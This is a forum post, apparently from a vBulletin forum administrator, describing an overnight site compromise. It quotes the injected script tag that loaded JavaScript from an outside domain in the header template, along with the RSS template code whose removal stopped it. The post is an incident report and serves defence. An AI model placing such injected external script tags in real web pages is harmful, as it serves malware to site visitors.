Noticed when I hit the our site this morning that the JS was broken.
Then I got an Avast malware error and saw that this code was in headerinclude template area:
veggiezjuly is the hack which happened some time overnight.
Closed the forums and started investigating. Nothing in Google.
We hadn't had any file, template or plugin edits, unusual ftp access or control panel log activity showing for that period of time.
Removing this from the headinglcude template fixed it:
Then we put that code back, but the veggiezjuly line didn't return.
Still investigating.
It's something relating to the external.php script.
Then I got an Avast malware error and saw that this code was in headerinclude template area:
HTML Code:
<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" /> <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script> <script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
Closed the forums and started investigating. Nothing in Google.
We hadn't had any file, template or plugin edits, unusual ftp access or control panel log activity showing for that period of time.
Removing this from the headinglcude template fixed it:
HTML Code:
<if condition="$vboptions['externalrss']"> <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] RSS Feed" href="external.php?type=RSS2" /> <if condition="$show['foruminfo'] OR $show['threadinfo']"> <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] - $foruminfo[title_clean] - RSS Feed" href="external.php?type=RSS2&forumids=$foruminfo[forumid]" /> </if> </if>
Still investigating.
It's something relating to the external.php script.
Comment